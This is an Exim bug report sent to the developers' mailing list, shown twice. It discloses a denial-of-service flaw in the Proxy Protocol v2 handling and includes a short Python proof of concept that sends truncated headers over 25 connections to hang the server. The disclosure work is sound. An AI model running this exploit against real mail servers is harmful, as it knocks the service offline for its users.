https://bugs.exim.org/show_bug.cgi?id=2957
Bug ID: 2957
Summary: DoS In Proxy Protocol v2 handling
Product: Exim
Version: 4.96+
Hardware: x86-64
OS: Linux
Status: NEW
Severity: security
Priority: medium
Component: Delivery in general
Assignee: unallocated@exim.org
Reporter: kevin.massey1189@gmail.com
CC: exim-dev@exim.org
By sending a partial proxy protocol v2 message, exim enters an endless loop in
setup_proxy_protocol_host() on line 1338. If enough messages are sent to meet
the maximum allowed number of connections, then all additional connections are
rejected. This loop persists even if the connection is manually torn down on
the host.
I assume this is fairly low impact as exim must be compiled with SUPPORT_PROXY
enabled and the sending host must be listed in the hosts_proxy configuration
entry (either directly or as part of a wildcard).
PoC
--------------------------------------------------------------------------------
import socket
MAX_CONNECTIONS = 25
hst = "10.0.0.182"
port = 2525
i = 0
while i < MAX_CONNECTIONS:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((hst, port))
s.send(b"\x0d\x0a\x0d\x0a\x00\x0d\x0a\x51\x55\x49\x54\x0a\x21\x11\x00\x01")
i += 1
--------------------------------------------------------------------------------
--
You are receiving this mail because:
You are on the CC list for the bug.
--
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##
Bug ID: 2957
Summary: DoS In Proxy Protocol v2 handling
Product: Exim
Version: 4.96+
Hardware: x86-64
OS: Linux
Status: NEW
Severity: security
Priority: medium
Component: Delivery in general
Assignee: unallocated@exim.org
Reporter: kevin.massey1189@gmail.com
CC: exim-dev@exim.org
By sending a partial proxy protocol v2 message, exim enters an endless loop in
setup_proxy_protocol_host() on line 1338. If enough messages are sent to meet
the maximum allowed number of connections, then all additional connections are
rejected. This loop persists even if the connection is manually torn down on
the host.
I assume this is fairly low impact as exim must be compiled with SUPPORT_PROXY
enabled and the sending host must be listed in the hosts_proxy configuration
entry (either directly or as part of a wildcard).
PoC
--------------------------------------------------------------------------------
import socket
MAX_CONNECTIONS = 25
hst = "10.0.0.182"
port = 2525
i = 0
while i < MAX_CONNECTIONS:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((hst, port))
s.send(b"\x0d\x0a\x0d\x0a\x00\x0d\x0a\x51\x55\x49\x54\x0a\x21\x11\x00\x01")
i += 1
--------------------------------------------------------------------------------
--
You are receiving this mail because:
You are on the CC list for the bug.
--
## List details at https://lists.exim.org/mailman/listinfo/exim-dev Exim details at http://www.exim.org/ ##